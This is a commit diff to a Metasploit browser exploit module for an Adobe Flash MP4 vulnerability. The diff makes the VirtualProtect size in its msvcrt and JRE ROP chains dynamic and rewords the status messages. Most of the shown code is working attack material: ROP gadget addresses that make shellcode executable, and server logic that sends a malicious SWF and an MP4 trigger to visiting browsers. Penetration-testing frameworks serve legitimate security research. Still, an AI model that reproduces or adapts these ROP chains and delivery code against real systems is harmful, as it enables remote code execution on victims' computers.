Dynamic VirtualProtect dwSize. Change output style.

modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb

@@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Both ROP chains generated by mona.py - See corelan.be
 		case t['Rop']
 		when :msvcrt
-			print_status("Using msvcrt ROP against #{cli.peerhost}:#{cli.peerport}")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
+			exec_size = code.length
 			rop =
 			[
 				0x77c4e392,  # POP EAX # RETN
@@ -146,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				0x77c4ec00,  # POP EBP # RETN
 				0x77c35459,  # ptr to 'push esp #  ret'
 				0x77c47705,  # POP EBX # RETN
-				0x00000800,  # <- change size to mark as executable if needed (-> ebx)
+				exec_size,   # EBX
 				0x77c3ea01,  # POP ECX # RETN
 				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
 				0x77c46100,  # POP EDI # RETN 
@@ -154,16 +155,17 @@ class Metasploit3 < Msf::Exploit::Remote
 				0x77c4d680,  # POP EDX # RETN
 				0x00000040,  # newProtect (0x40) (-> edx)
 				0x77c4e392,  # POP EAX # RETN
-				nop,  # NOPS (-> eax)
+				nop,         # NOPS (-> eax)
 				0x77c12df9,  # PUSHAD # RETN
 			].pack("V*")
 
 		when :jre
-			print_status("Using JRE ROP against #{cli.peerhost}:#{cli.peerport}")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
+			exec_size = [0-code.length].pack('V').unpack('L')[0].to_i
 			rop =
 			[
 				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-				0xfffffdff,  # Value to negate, will become 0x00000201 (dwSize)
+				exec_size,   # Value to negate, will become 0x00000201 (dwSize)
 				0x7c347f98,  # RETN (ROP NOP)
 				0x7c3415a2,  # JMP [EAX]
 				0xffffffff,
@@ -217,23 +219,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
-			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
+			print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
 			send_not_found(cli)
 			return
 		end
 
-		print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
+		print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
 
 		# The SWF requests our MP4 trigger
 		if request.uri =~ /\.mp4$/
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
 			mp4 = create_mp4(my_target)
 			send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
 			return
 		end
 
 		if request.uri =~ /\.swf$/
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
+			print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
 			send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
 			return
 		end
@@ -305,7 +307,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
 		end
 
 		add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
-		print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
+		print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
 		send_response(cli, html, {'Content-Type'=>'text/html'})
 	end